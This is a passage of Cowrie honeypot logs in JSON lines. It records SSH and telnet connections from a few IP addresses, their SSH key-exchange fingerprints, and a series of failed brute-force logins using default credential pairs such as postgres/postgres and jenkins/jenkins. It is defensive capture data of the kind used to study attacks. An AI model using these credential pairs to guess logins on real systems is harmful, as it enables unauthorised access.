sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:18:32.560353Z","src_ip":"185.93.89.7","session":"3fa32dc4340c"}
{"eventid":"cowrie.login.failed","username":"index","password":"secret","message":"login attempt [index/secret] failed","sensor":"my-vps","timestamp":"2025-08-28T09:18:32.672416Z","src_ip":"185.93.89.7","session":"3fa32dc4340c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:18:33.692307Z","src_ip":"185.93.89.7","session":"3fa32dc4340c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":48306,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b674224e459","protocol":"ssh","message":"New connection: 51.79.164.132:48306 (1.2.3.4:22) [session: 9b674224e459]","sensor":"my-vps","timestamp":"2025-08-28T09:18:52.181446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:18:52.313486Z","src_ip":"51.79.164.132","session":"9b674224e459"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:18:52.989556Z","src_ip":"51.79.164.132","session":"9b674224e459"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T09:18:54.338758Z","src_ip":"51.79.164.132","session":"9b674224e459"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:18:55.941061Z","src_ip":"51.79.164.132","session":"9b674224e459"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35396,"dst_ip":"1.2.3.4","dst_port":22,"session":"c17e03658a26","protocol":"ssh","message":"New connection: 185.93.89.7:35396 (1.2.3.4:22) [session: c17e03658a26]","sensor":"my-vps","timestamp":"2025-08-28T09:18:56.537958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:18:56.542230Z","src_ip":"185.93.89.7","session":"c17e03658a26"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:18:56.555953Z","src_ip":"185.93.89.7","session":"c17e03658a26"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdfgh","message":"login attempt [index/asdfgh] failed","sensor":"my-vps","timestamp":"2025-08-28T09:18:56.610197Z","src_ip":"185.93.89.7","session":"c17e03658a26"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:18:57.632370Z","src_ip":"185.93.89.7","session":"c17e03658a26"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":57812,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd82e98f612e","protocol":"ssh","message":"New connection: 51.79.164.132:57812 (1.2.3.4:22) [session: fd82e98f612e]","sensor":"my-vps","timestamp":"2025-08-28T09:19:18.639661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:19:18.808993Z","src_ip":"51.79.164.132","session":"fd82e98f612e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:19:19.268103Z","src_ip":"51.79.164.132","session":"fd82e98f612e"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T09:19:20.622178Z","src_ip":"51.79.164.132","session":"fd82e98f612e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54530,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d5ff0f03b2b","protocol":"ssh","message":"New connection: 185.93.89.7:54530 (1.2.3.4:22) [session: 9d5ff0f03b2b]","sensor":"my-vps","timestamp":"2025-08-28T09:19:20.630974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:19:20.697650Z","src_ip":"185.93.89.7","session":"9d5ff0f03b2b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:19:20.698372Z","src_ip":"185.93.89.7","session":"9d5ff0f03b2b"}
{"eventid":"cowrie.login.failed","username":"index","password":"987654321","message":"login attempt [index/987654321] failed","sensor":"my-vps","timestamp":"2025-08-28T09:19:20.986112Z","src_ip":"185.93.89.7","session":"9d5ff0f03b2b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:19:22.005929Z","src_ip":"185.93.89.7","session":"9d5ff0f03b2b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:19:22.234652Z","src_ip":"51.79.164.132","session":"fd82e98f612e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54108,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3f41454824","protocol":"ssh","message":"New connection: 185.93.89.7:54108 (1.2.3.4:22) [session: 4f3f41454824]","sensor":"my-vps","timestamp":"2025-08-28T09:19:44.039543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:19:44.066598Z","src_ip":"185.93.89.7","session":"4f3f41454824"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:19:44.067324Z","src_ip":"185.93.89.7","session":"4f3f41454824"}
{"eventid":"cowrie.login.failed","username":"index","password":"123abc","message":"login attempt [index/123abc] failed","sensor":"my-vps","timestamp":"2025-08-28T09:19:44.188394Z","src_ip":"185.93.89.7","session":"4f3f41454824"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38716,"dst_ip":"1.2.3.4","dst_port":22,"session":"529830b2a778","protocol":"ssh","message":"New connection: 51.79.164.132:38716 (1.2.3.4:22) [session: 529830b2a778]","sensor":"my-vps","timestamp":"2025-08-28T09:19:44.868936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:19:45.037452Z","src_ip":"51.79.164.132","session":"529830b2a778"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:19:45.209451Z","src_ip":"185.93.89.7","session":"4f3f41454824"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:19:45.720541Z","src_ip":"51.79.164.132","session":"529830b2a778"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-28T09:19:47.125908Z","src_ip":"51.79.164.132","session":"529830b2a778"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:19:48.520574Z","src_ip":"51.79.164.132","session":"529830b2a778"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":55130,"dst_ip":"1.2.3.4","dst_port":22,"session":"41f02da1373d","protocol":"ssh","message":"New connection: 185.93.89.7:55130 (1.2.3.4:22) [session: 41f02da1373d]","sensor":"my-vps","timestamp":"2025-08-28T09:20:07.538857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:20:07.541436Z","src_ip":"185.93.89.7","session":"41f02da1373d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:20:07.557864Z","src_ip":"185.93.89.7","session":"41f02da1373d"}
{"eventid":"cowrie.login.failed","username":"index","password":"fuckyou","message":"login attempt [index/fuckyou] failed","sensor":"my-vps","timestamp":"2025-08-28T09:20:07.613287Z","src_ip":"185.93.89.7","session":"41f02da1373d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:20:08.633301Z","src_ip":"185.93.89.7","session":"41f02da1373d"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52266,"dst_ip":"1.2.3.4","dst_port":22,"session":"d60b4597f79e","protocol":"ssh","message":"New connection: 51.79.164.132:52266 (1.2.3.4:22) [session: d60b4597f79e]","sensor":"my-vps","timestamp":"2025-08-28T09:20:12.321384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:20:12.578278Z","src_ip":"51.79.164.132","session":"d60b4597f79e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:20:12.579370Z","src_ip":"51.79.164.132","session":"d60b4597f79e"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-28T09:20:14.934092Z","src_ip":"51.79.164.132","session":"d60b4597f79e"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:20:16.301326Z","src_ip":"51.79.164.132","session":"d60b4597f79e"}
{"eventid":"cowrie.session.connect","src_ip":"184.22.103.96","src_port":53960,"dst_ip":"1.2.3.4","dst_port":23,"session":"27d9c9278e61","protocol":"telnet","message":"New connection: 184.22.103.96:53960 (1.2.3.4:23) [session: 27d9c9278e61]","sensor":"my-vps","timestamp":"2025-08-28T09:20:26.058800Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":58414,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dd01095aeb5","protocol":"ssh","message":"New connection: 185.93.89.7:58414 (1.2.3.4:22) [session: 6dd01095aeb5]","sensor":"my-vps","timestamp":"2025-08-28T09:20:31.299707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:20:31.300654Z","src_ip":"185.93.89.7","session":"6dd01095aeb5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.